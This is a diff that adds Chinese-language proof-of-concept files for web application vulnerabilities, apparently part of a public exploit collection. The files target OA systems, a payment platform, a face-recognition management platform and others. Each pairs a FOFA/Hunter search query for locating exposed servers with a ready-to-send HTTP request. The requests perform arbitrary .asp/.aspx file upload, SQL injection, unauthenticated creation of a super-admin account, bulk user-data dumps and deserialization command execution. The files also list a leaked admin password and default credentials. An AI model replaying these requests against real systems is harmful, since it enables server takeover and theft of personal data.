+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
+Connection:close
+```
+
+![172b7391acfeadb4aaa11d4f2ca85f61](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062301856.jpg)
+
+![f1bd297bb76c5e5fa0b587da24d15bd4](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062301906.jpg)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/5t_w0ddXQslco6r0f9Rxgg
diff --git a/联达OA-uploadLogo.aspx存在任意文件上传.md b/联达OA-uploadLogo.aspx存在任意文件上传.md
new file mode 100644
index 0000000..28a6ecd
--- /dev/null
+++ b/联达OA-uploadLogo.aspx存在任意文件上传.md
@@ -0,0 +1,28 @@
+## 联达OA uploadLogo.aspx存在任意文件上传
+
+## fofa
+```
+app="联达OA"
+```
+
+## poc
+```
+POST /Hosp_Portal/uploadLogo.aspx HTTP/1.1
+Host: 
+Content-Length: 191
+Content-Type: multipart/form-data; boundary=------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+--------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA
+Content-Disposition: form-data; name="DesignId"
+
+1
+--------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA
+Content-Disposition: form-data; name="Filedata";filename="123.asp"
+
+123
+--------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA--
+```
+
+文件路径
+`http://xxx/Hosp_Portal/Logo/123.asp`
diff --git a/联达OA接口uploadImg.aspx任意文件上传漏洞.md b/联达OA接口uploadImg.aspx任意文件上传漏洞.md
new file mode 100644
index 0000000..c243cfe
--- /dev/null
+++ b/联达OA接口uploadImg.aspx任意文件上传漏洞.md
@@ -0,0 +1,39 @@
+# 联达OA接口uploadImg.aspx任意文件上传漏洞
+
+联达OA uploadImg.aspx 接口处存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## Fofa
+
+```javascript
+app="联达OA"
+```
+
+## poc
+
+```javascript
+POST /Dept_Portal/uploadImg.aspx HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
+Content-Type: multipart/form-data; boundary=boundary=00content0boundary00
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+ 
+--00content0boundary00
+Content-Disposition: form-data; name="DesignId"
+ 
+1
+--00content0boundary00
+Content-Disposition: form-data; name="Filedata"; filename="../../../../b.asp"
+Content-Type: image/png
+ 
+<% Response.Write("Hello, World") %>
+--00content0boundary00--
+```
+
+![image-20241021210452916](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251422669.png)
+
+```
+/b.asp
+```
+
+![image-20241021210504062](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251422557.png)
diff --git a/聚合支付平台接口sdcustomno存在SQL注入漏洞.md b/聚合支付平台接口sdcustomno存在SQL注入漏洞.md
new file mode 100644
index 0000000..1f25ba5
--- /dev/null
+++ b/聚合支付平台接口sdcustomno存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 聚合支付平台接口sdcustomno存在SQL注入漏洞
+
+聚合支付平台接口sdcustomno存在SQL注入漏洞
+
+## fofa
+
+```javascript
+"/Public/theme/view4/css/style.css"
+```
+
+## poc
+
+```javascript
+GET /pay_UPALIWAP_callbackurl?sdcustomno=*%27)%20AND%20(SELECT%202655%20FROM%20(SELECT(SLEEP(5)))DNPm)%20AND%20(%27RWpf%27=%27RWpf HTTP/1.1
+Host: 127.0.0.1                                                                                          
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0
+Connection: keep-alive
+```
+
+![image-20241107115047722](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411071150773.png)
\ No newline at end of file
diff --git a/脸爱云-一脸通智慧管理平台任意用户添加漏洞.md b/脸爱云-一脸通智慧管理平台任意用户添加漏洞.md
new file mode 100644
index 0000000..0a9b304
--- /dev/null
+++ b/脸爱云-一脸通智慧管理平台任意用户添加漏洞.md
@@ -0,0 +1,30 @@
+## 脸爱云 一脸通智慧管理平台任意用户添加漏洞
+
+脸爱云一脸通智慧管理平台是一套功能强大,运行稳定、操作简单方便、用户界面美观,轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。该管理平台/SystemMng.ashx接口处存在权限绕过漏洞,可通过输入00操纵参数operatorRole，导致特权管理不当，未经身份认证攻击者可以通过此漏洞创建超级管理员账户，造成信息泄露和后台接管。
+
+
+## fofa
+```
+"欢迎使用脸爱云 一脸通智慧管理平台"
+```
+
+## poc
+```
+POST /SystemMng.ashx HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/top.html
+Connection: close
+Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 175
+
+operatorName=test1&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
+```
+![image](https://github.com/wy876/POC/assets/139549762/8ae7871e-8eed-4986-a9f8-ad4168b15e2d)
+
+![image](https://github.com/wy876/POC/assets/139549762/ab201a23-b27a-40d5-9f80-46e1218f238c)
diff --git a/脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞.md b/脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞.md
new file mode 100644
index 0000000..3d641c9
--- /dev/null
+++ b/脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞.md
@@ -0,0 +1,36 @@
+# 脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">脸爱云一脸通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 脸爱云一脸通智慧管理平台
+
+# 三、资产测绘
++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"`
++ 特征
+
+![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/pmeeBVqtGnp0G6v2/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-869505.png)
+
+# 四、漏洞复现
+```java
+POST /MoneyMng.ashx HTTP/1.1
+Host: 
+Content-Length: 19
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+funcName=getDataAll
+```
+
+![1714290083008-d3dbe18b-ab5a-4387-8d2d-aacb9473959b.png](./img/pmeeBVqtGnp0G6v2/1714290083008-d3dbe18b-ab5a-4387-8d2d-aacb9473959b-239033.png)
+
+
+
+> 更新: 2024-04-28 15:45:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tqe4b2kisd87ki3g>
\ No newline at end of file
diff --git a/脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞.md b/脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞.md
new file mode 100644
index 0000000..8bcd414
--- /dev/null
+++ b/脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞.md
@@ -0,0 +1,36 @@
+# 脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">脸爱云一脸通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 脸爱云一脸通智慧管理平台
+
+# 三、资产测绘
++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"`
++ 特征
+
+![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/d-p_aLeuFN8QvEiC/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-514081.png)
+
+# 四、漏洞复现
+```java
+POST /SystemMng.ashx HTTP/1.1
+Host: 
+Content-Length: 36
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+username=admin&funcName=SelOperators
+```
+
+![1714290470519-b752a318-bdc6-4820-8745-c12bef1d956b.png](./img/d-p_aLeuFN8QvEiC/1714290470519-b752a318-bdc6-4820-8745-c12bef1d956b-072385.png)
+
+
+
+> 更新: 2024-04-28 15:48:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gg2q9qg8ttmq4azt>
\ No newline at end of file
diff --git a/脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞.md b/脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞.md
new file mode 100644
index 0000000..f8d2fc6
--- /dev/null
+++ b/脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞.md
@@ -0,0 +1,41 @@
+# 脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">脸爱云一脸通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞。攻击者可通过该漏洞获取应用权限。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 脸爱云一脸通智慧管理平台
+
+# 三、资产测绘
++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"`
++ 特征
+
+![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/wRJWfGtKU0DFAQyR/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-193599.png)
+
+# 四、漏洞复现
+```plain
+POST /SystemMng.ashx HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 175
+
+operatorName=stctest&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
+```
+
+![1700649221299-828e61a4-94f2-4098-9d57-743b83272090.png](./img/wRJWfGtKU0DFAQyR/1700649221299-828e61a4-94f2-4098-9d57-743b83272090-571583.png)
+
+使用添加的账号`stctest/123456`登录系统
+
+![1700649249316-20c950fe-5d84-4d4d-8e9d-ec42c5066ac3.png](./img/wRJWfGtKU0DFAQyR/1700649249316-20c950fe-5d84-4d4d-8e9d-ec42c5066ac3-560999.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/txdammysmosfwe7o>
\ No newline at end of file
diff --git a/脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞.md b/脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞.md
new file mode 100644
index 0000000..2bc647b
--- /dev/null
+++ b/脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞.md
@@ -0,0 +1,40 @@
+# 脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">脸爱云一脸通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 脸爱云一脸通智慧管理平台
+
+# 三、资产测绘
++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"`
++ 特征
+
+![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/KtUZ6_k7ZH5x80Dq/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-429358.png)
+
+# 四、漏洞复现
+```java
+POST /SystemMng.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Length: 91
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+
+page=1&arr_search=%7B%22username%22%3A%22%22%2C%22memo%22%3A%22%22%7D&funcName=getOperators
+```
+
+![1714289895012-ee2f78c8-a94c-4a20-ad0c-e26a9fb89139.png](./img/KtUZ6_k7ZH5x80Dq/1714289895012-ee2f78c8-a94c-4a20-ad0c-e26a9fb89139-479801.png)
+
+使用泄露的账号密码登录系统`admin/LSFace2023`
+
+
+
+
+
+> 更新: 2024-04-28 15:39:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qgkd6zg49i5orfef>
\ No newline at end of file
diff --git a/脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞.md b/脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞.md
new file mode 100644
index 0000000..8b8f8c2
--- /dev/null
+++ b/脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞.md
@@ -0,0 +1,57 @@
+# 脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">脸爱云一脸通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞。攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 脸爱云一脸通智慧管理平台
+
+# 三、资产测绘
++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"`
++ 特征
+
+![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/TMb0E4UMwzE5Sufh/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-957942.png)
+
+# 四、漏洞复现
+```java
+POST /UpLoadPic.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Length: 431
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13u
+X-Requested-With: XMLHttpRequest
+
+------WebKitFormBoundarywt7cEu1eBdibB13u
+Content-Disposition: form-data; name="action"
+
+post
+------WebKitFormBoundarywt7cEu1eBdibB13u
+Content-Disposition: form-data; name="myPhoto"; filename="1.aspx"
+Content-Type: image/png
+
+<% response.write("FC5E038D38A57032085441E7FE7010B0") %>
+------WebKitFormBoundarywt7cEu1eBdibB13u
+Content-Disposition: form-data; name="oldName"
+
+
+------WebKitFormBoundarywt7cEu1eBdibB13u--
+```
+
+![1714288574828-15ec00c1-67e4-41b6-99c0-178e1a014b21.png](./img/TMb0E4UMwzE5Sufh/1714288574828-15ec00c1-67e4-41b6-99c0-178e1a014b21-479202.png)
+
+文件上传位置
+
+```java
+/images/48884063e99e45ba9fc0fa7e138261021.aspx
+```
+
+![1714288605618-a32595ec-d02e-42eb-86d1-11b3e54dd707.png](./img/TMb0E4UMwzE5Sufh/1714288605618-a32595ec-d02e-42eb-86d1-11b3e54dd707-583654.png)
+
+
+
+> 更新: 2024-04-28 15:34:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pq3pt0qifwh7x5wo>
\ No newline at end of file
diff --git a/脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞.md b/脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞.md
new file mode 100644
index 0000000..95ee572
--- /dev/null
+++ b/脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞.md
@@ -0,0 +1,36 @@
+# 脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">脸爱云一脸通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 脸爱云一脸通智慧管理平台
+
+# 三、资产测绘
++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"`
++ 特征
+
+![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/b8NwS0h2DS3f8eR9/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-630933.png)
+
+# 四、漏洞复现
+```java
+POST /UserMng.ashx HTTP/1.1
+Host: 
+Content-Length: 483
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+page=1&arr_search=%7B%22bmmc%22%3A%22%22%2C%22rfzt%22%3A%22%22%2C%22cardid%22%3A%22%22%2C%22klb%22%3A%22%22%2C%22ryxm%22%3A%22%22%2C%22rybh%22%3A%22%22%2C%22sex%22%3A%22%22%2C%22ryzt%22%3A%22%22%2C%22rfoperator%22%3A%22%22%2C%22EngName%22%3A%22%22%2C%22WeChat%22%3A%22%22%2C%22Tel%22%3A%22%22%2C%22groupname%22%3A%22%22%2C%22jituanname%22%3A%22%22%2C%22companyname%22%3A%22%22%2C%22startime%22%3A%22%22%2C%22endtime%22%3A%22%22%2C%22order%22%3A%22khrq+desc%22%7D&funcName=getUserInfo
+```
+
+![1714290261285-83391a2e-b164-4fff-945a-1c541911cbe1.png](./img/b8NwS0h2DS3f8eR9/1714290261285-83391a2e-b164-4fff-945a-1c541911cbe1-043774.png)
+
+
+
+> 更新: 2024-04-28 15:44:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/idm4ngqgtd85umqv>
\ No newline at end of file
diff --git a/脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞.md b/脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞.md
new file mode 100644
index 0000000..36276bb
--- /dev/null
+++ b/脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞.md
@@ -0,0 +1,34 @@
+# 脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">脸爱云一脸通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 脸爱云一脸通智慧管理平台
+
+# 三、资产测绘
++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"`
++ 特征
+
+![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/oYOAbyeNxy0-K3kx/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-421332.png)
+
+# 四、漏洞复现
+```java
+GET /downloads.aspx?Ename=UserInfo&total=1000&jsonParam={%22rybh%22:%22%22,%22ryxm%22:%22%22,%22EngName%22:%22%22,%22groupname%22:%22%22,%22companyname%22:%22%22,%22bmmc%22:%22%22,%22ryzt%22:%22%22,%22rzstartime%22:%22%22,%22rzendtime%22:%22%22,%22lzstartime%22:%22%22,%22lzendtime%22:%22%22,%22zhiwu%22:%22%22,%22cardid%22:%22%22,%22rfzt%22:%22%22,%22klb%22:%22%22,%22sxstartime%22:%22%22,%22sxendtime%22:%22%22,%22khstartime%22:%22%22,%22khendtime%22:%22%22,%22rfoperator%22:%22%22,%22rfstartime%22:%22%22,%22rfendtime%22:%22%22,%22feat%22:%22%22} HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![1714289513778-bfcc1b6d-0d32-422d-90f6-64868d76dc93.png](./img/oYOAbyeNxy0-K3kx/1714289513778-bfcc1b6d-0d32-422d-90f6-64868d76dc93-068062.png)
+
+![1714289539725-6727a5dd-f8c7-49a6-9297-493ce0cdb52d.png](./img/oYOAbyeNxy0-K3kx/1714289539725-6727a5dd-f8c7-49a6-9297-493ce0cdb52d-931943.png)
+
+
+
+> 更新: 2024-04-28 15:34:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lim8z4ebk4m2ztoh>
\ No newline at end of file
diff --git a/腾狐TOS行为管理系统存在弱口令漏洞.md b/腾狐TOS行为管理系统存在弱口令漏洞.md
new file mode 100644
index 0000000..6a3d544
--- /dev/null
+++ b/腾狐TOS行为管理系统存在弱口令漏洞.md
@@ -0,0 +1,28 @@
+# 腾狐TOS行为管理系统存在弱口令漏洞
+
+# 一、漏洞简介
+腾狐TOS行为管理系统存在弱口令漏洞，攻击者通过漏洞可以访问后台。
+
+# 二、影响版本
++ 腾狐TOS行为管理系统
+
+# 三、资产测绘
+```plain
+product="TENHOT-TOS-行为管理系统"
+```
+
+![1716365453445-63b439a5-1814-485f-a5d0-77289f7543c6.png](./img/Pzseu53sX_u69vr8/1716365453445-63b439a5-1814-485f-a5d0-77289f7543c6-843561.png)
+
+# 四、漏洞复现
+```plain
+admin/admin
+admin/admin123
+admin/123456
+```
+
+![1716365300974-02b9823c-9edf-458e-b13d-cac6c4981075.png](./img/Pzseu53sX_u69vr8/1716365300974-02b9823c-9edf-458e-b13d-cac6c4981075-129835.png)
+
+
+
+> 更新: 2024-05-23 12:34:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wzutuulbn01kzlfi>
\ No newline at end of file
diff --git a/自助打印微信小程序系统存在SQL注入漏洞.md b/自助打印微信小程序系统存在SQL注入漏洞.md
new file mode 100644
index 0000000..6d28ff1
--- /dev/null
+++ b/自助打印微信小程序系统存在SQL注入漏洞.md
@@ -0,0 +1,37 @@
+# 自助打印微信小程序系统存在SQL注入漏洞
+
+# 一、漏洞简介
+微数字化时代，打印服务的需求与日俱增。为了满足用户的便利需求，全新UI的自助打印系统/云打印小程序。全新UI设计：采用2024年最新的UI设计风格，界面简洁美观，用户体验极佳。云打印功能：支持用户通过小程序上传文件并进行云端打印，方便快捷。自助服务：用户可以自主选择打印参数，如打印份数、纸张类型等，实现真正的自助打印。多平台支持：源码支持微信小程序平台，方便用户在移动端进行操作。自助打印微信小程序系统存在SQL注入漏洞
+
+# 二、影响版本
++ 自助打印微信小程序系统
+
+# 三、资产测绘
++ fofa`"未登录" && "/admin/login/index.html"`
++ 特征
+
+![1731770780231-233931af-9dae-4e66-b394-ceeaf5ac5ef0.png](./img/8MSyZ7Ia8bEhgqoI/1731770780231-233931af-9dae-4e66-b394-ceeaf5ac5ef0-467114.png)
+
+# 四、漏洞复现
+```java
+POST /api/shop/nearByShop HTTP/1.1
+Host: 
+Content-Length: 104
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Connection: close
+
+latitude=1&longitude=GTID_SUBSET(CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),1,190))),9392)
+```
+
+![1731770611972-822ff61c-09a2-48b2-8d1d-ed5a9ef930cd.png](./img/8MSyZ7Ia8bEhgqoI/1731770611972-822ff61c-09a2-48b2-8d1d-ed5a9ef930cd-909864.png)
+
+
+
+> 更新: 2024-11-27 10:00:05  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/plik2eccznoh6366>
\ No newline at end of file
diff --git a/致翔OA系统接口open_juese存在SQL注入漏洞.md b/致翔OA系统接口open_juese存在SQL注入漏洞.md
new file mode 100644
index 0000000..bfeafee
--- /dev/null
+++ b/致翔OA系统接口open_juese存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 致翔OA系统接口open_juese存在SQL注入漏洞
+      致翔科技由广州致翔计算机科技有限公司和深圳分公司以及各地还有多家办事处组成，是以IT软件技术和管理不断创新为核心的客户需求导向型的高新技术和双软认证软件技术公司。致翔公司产品核心团队主要由具备多年实际企业管理与IT研发经验的专家级技术人才组成，研发与经营产品系列包括:集成多个行业应用功能的智慧协同平台，以及PC网站，手机APP、微信端的研发，可以为企事业单位，教育机构提供行业版本基础上按需定制的管理系统解决方案，目前已经成功应用在华为技术，铁通广东分公司，深圳海丽达幼儿园集团，广州卫监所，东莞南开学校，福州高级中学，长沙明达学校，上海中学东校，深圳凯卓立液压，中国路港集团，南方周末，广东煌上煌食品集团，广州天马摩托车集团公司，深圳电信实业，广东冠盛集团等超过1000家企事业单位，取得了显著的经济和管理效益。致翔OA open_juese存在SQL注入漏洞，未经授权的攻击者可通过该漏洞获取数据库敏感信息。
+
+## fofa
+```javascript
+app="致翔软件-致翔OA"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1727332106847-17eef327-0131-44fc-8f66-5e218638666a.png)
+
+## poc
+```java
+GET /OpenWindows/open_juese.aspx?key=1&name=1&user=-1)+and+1=user--+&requeststr= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate, br, zstd
+Accept: */*
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731984893405-50be8661-ec4c-4cb0-b0ba-d33128548e03.png)
+
diff --git a/致远M1 usertokenservice 反序列化RCE漏洞.md b/致远M1 usertokenservice 反序列化RCE漏洞.md
index dd39d9e..a3aca85 100644
--- a/致远M1 usertokenservice 反序列化RCE漏洞.md	
+++ b/致远M1 usertokenservice 反序列化RCE漏洞.md	
@@ -9,139 +9,43 @@
 ```
 POST /esn_mobile_pns/service/userTokenService HTTP/1.1
 Host: {{Hostname}}
-User-Agent: Mozilla/5.0 
 Content-Type: application/x-www-form-urlencoded
 cmd: @@@@@echo test
 
